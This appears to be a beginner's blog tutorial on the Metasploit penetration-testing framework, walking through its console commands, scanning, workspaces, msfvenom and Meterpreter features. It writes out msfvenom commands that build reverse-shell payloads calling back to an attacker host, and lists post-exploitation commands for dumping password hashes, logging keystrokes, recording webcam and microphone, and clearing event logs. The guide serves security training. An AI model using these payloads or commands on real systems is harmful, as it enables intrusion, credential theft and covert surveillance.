Mastering Metasploit: A Comprehensive Guide to Ethical Hacking

Introduction #

Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.

The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.

Terminologies #

1. RHOSTS: Remote Hosts is the target/victim machine.
2. RPORT: Remote port of target machine.

2. PAYLOAD: The payload you will use with the exploit.

3. LHOST: Localhost or attacker machine.

4. LPORT: Local port where we will get a reverse shell to connect back.

5. SESSION: Each connection established to the target system using Metasploit will have a session ID.

Initialize #

To start the metasploit use the keyword msfconsole.

msfconsole

We can see that msf6 is visible which means the Metasploit version is 6 it may differ from system to system, if you see your’s in msf5 then try to upgrade to the latest version.

History #

Using the history command we can see the earlier commands which were used.

History

Search #

Using the search command with the parameter as the exploit name we can find the exploit we need to use.

Search by name

Also, we can use the CVE to find the exploit if not by the name.

Search by CVE

Module #

We can select the module either by using the number of the module or by selecting the module’s path.

We can see below the default payload is configured, which is reverse_tcp.

options #

To check the options use the options command so that we can check what needs to be configured in it.

Load module

Info #

We can use the info command to check information about the exploit like name, platform, targets, and more.

Info of exploit

Payloads #

Use the show payloads command to display the list of all the payloads available here.

Show payloads

We can also specify our search by using the type: parameter command with search.

Search type:<parameter>

Set Options #

Using the set option set all the required settings like RHOSTS, SMBPass, SMBUser, and more which may vary on the exploit we will be using.

We can also set the LHOST in cases where we are using TryHackMe’s OpenVPN IP Address.

Set Options

Here we can see that the exploit target is been selected automatically and we do not need to assign it.

Exploit/Run #

After setting all the required options we can finally use the exploit/run command to execute the exploit/payload on the target machine in which we will be getting a reverse shell back to our attacker machine.

Execute Exploit

Unset #

Using the unset all command we can clear all the settings which we have done earlier and now we want to assign it for other machines and other purposes.

Unset All Options

Exploit Ranking #

Exploit Rankings

Source: Metasploit Documentation

Modules #

1. Metasploit cmd prompt:
The cmd prompt where all the Metasploit. commands will be entered

2. Meterpreter cmd prompt:
This means a Meterpreter agent was loaded to the target system and connected back to you.

3. Shell:
Once the exploit is completed, you may have access to a command shell on the target system. All commands typed here run on the target system.

4. Sessions:
Using the sessions option we can see the existing sessions.

To interact with any session, you can use the sessions -i command followed by the desired session number.

Scanning #

1. Port Scan:
Metasploit has several modules to scan open ports on the target system and network. You can list potential port scanning modules available using the search portscan command.

2. Nmap Scan:
You can directly perform Nmap scans from the msfconsole prompt as shown below.

3. UDP Scan:
The scanner/discovery/udp_sweep module will allow you to quickly identify services running over the UDP. This module will not conduct an extensive scan of all possible UDP services but does provide a quick way to identify services such as DNS or NetBIOS.

4. SMB Scan:
Metasploit offers several useful auxiliary modules that allow us to scan specific services. Below is an example for the SMB. Especially useful in a corporate network would be smb_enumshares and smb_version.

DataBase #

1. DB Status:
Check the database status using the db_status command.

2. List Workspaces:
The database feature will allow you to create workspaces to isolate different projects. When first launched, we will be in the default workspace. You can list available workspaces using the workspace command.

3. Adding Workspaces:
You can add a workspace using the -a parameter or delete a workspace using the -d parameter, respectively. Below shows that a new workspace named "tryhackme" was created.

The *symbol shows the currently active workspace we are using.

4. Changing Workspace:
You can use the workspace command to navigate between workspaces simply by typing workspace followed by desired workspace name.

5. Workspace Help Menu:
You can use the workspace -h command to list available options for the workspace command.

6. DB Backend Cmd:
Different from regular Metasploit usage, once Metasploit is launched with a database, the help command, you will show the Database Backends Commands menu.

Msfvenom #

Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc).

Set Listener #
We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.

Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.

Reverse Shell #
Once everything is set, we will run the handler and wait for the incoming connection.

Other Payloads #
1. Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address LPORT=Port -f exe > rev_shell.exe

2. PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=IP Address LPORT=Port -f raw > rev_shell.php

3. ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address LPORT=Port -f asp > rev_shell.asp

4. Python:

msfvenom -p cmd/unix/reverse_python LHOST=IP Address LPORT=Port -f raw > rev_shell.py

Meterpreter #

Meterpreter has a wide range of different versions you can choose from based on your target system.

Meterpreter versions are available for the following platforms:

Android
Apple iOS
Java
Linux
OSX
PHP
Python
Windows

List Meterpreter Payloads

Meterpreter Help Menu

Meterpreter Commands #

If you run the help command, you will see Meterpreter commands are listed under different categories.

Core commands
File system commands
Networking commands
System commands
User interface commands
Webcam commands
Audio output commands
Elevate commands
Password database commands
Timestamp commands

Core commands:

• background: Backgrounds the current session
• exit: Terminate the Meterpreter session
• guid: Get the session GUID (Globally Unique Identifier)
• help: Displays the help menu
• info: Displays information about a Post module
• irb: Opens an interactive Ruby shell on the current session
• load: Loads one or more Meterpreter extensions
• migrate: Allows you to migrate Meterpreter to another process
• run: Executes a Meterpreter script or Post module
• sessions: Quickly switch to another session

File system commands:

• cd: Will change directory
• ls: Will list files in the current directory (dir will also work)
• pwd: Prints the current working directory
• edit: will allow you to edit a file
• cat: Will show the contents of a file to the screen
• rm: Will delete the specified file
• search: Will search for files
• upload: Will upload a file or directory
• download: Will download a file or directory

Networking commands:

• arp: Displays the host ARP (Address Resolution Protocol) cache
• ifconfig: Displays network interfaces available on the target system
• netstat: Displays the network connections
• portfwd: Forwards a local port to a remote service
• route: Allows you to view and modify the routing table

System commands:

• clearev: Clears the event logs
• execute: Executes a command
• getpid: Shows the current process identifier
• getuid: Shows the user that Meterpreter is running as
• kill: Terminates a process
• pkill: Terminates processes by name
• ps: Lists running processes
• reboot: Reboots the remote computer
• shell: Drops into a system command shell
• shutdown: Shuts down the remote computer
• sysinfo: Gets information about the remote system, such as OS

Other commands:

• idletime: Returns the number of seconds the remote user has been idle
• keyscan_dump: Dumps the keystroke buffer
• keyscan_start: Starts capturing keystrokes
• keyscan_stop: Stops capturing keystrokes
• screenshare: Allows you to watch the remote user's desktop in real-time
• screenshot: Grabs a screenshot of the interactive desktop
• record_mic: Records audio from the default microphone for X seconds
• webcam_chat: Starts a video chat
• webcam_list: Lists webcams
• webcam_snap: Takes a snapshot from the specified webcam
• webcam_stream: Plays a video stream from the specified webcam
• getsystem: Attempts to elevate your privilege to that of local system
• hashdump: Dumps the contents of the SAM database

Post-Exploitation #

1. getuid:
The getuid command will display the user with which Meterpreter is currently running. This will give you an idea of your possible privilege level on the target system (Eg: Are you an admin-level user like NT AUTHORITY\SYSTEM or a regular user?)

2. ps and migrate:
The ps command will list running processes. The PID column will also give you the PID information you will need to migrate the Meterpreter to another process.

3. hashdump:
The hashdump command will list the content of the SAM database. The SAM database stores user's passwords on Windows systems. These passwords are stored in the NTLM format.

4. search:
The search command is useful for locating files with potentially juicy information. In actual penetration testing engagements, you may need to search for user-generated files or configuration files that may contain password or account information.

5. Shell:
The shell command will launch a regular command-line shell on the target system.

Conclusion #

As we conclude our exploration of Metasploit, it’s clear that this powerful framework has revolutionized the field of cybersecurity. From its humble beginnings as a hobby project to its current status as an essential tool for security professionals worldwide, Metasploit continues to evolve and adapt to the ever-changing landscape of cyber threats.

Remember, with great power comes great responsibility. It’s essential to always use tools like Metasploit ethically and responsibly, respecting the boundaries of legality and privacy. Continuously expanding your knowledge and skills in cybersecurity is vital in staying ahead of potential threats and contributing positively to the security community.

I hope this blog has provided you with valuable insights into the world of Metasploit and inspired you to delve deeper into this fascinating field. There’s a lot more about the Metasploit to learn I suggest exploring it by yourself and learning more advance concepts.

“ Metasploit: Where innovation meets infiltration, turning vulnerabilities into victories. ”

Be sure to explore our other blog entries for further guidance on navigating the digital landscape and enhancing your learning experience!

☣ ️Happy Hacking! ☣ ️
— XoX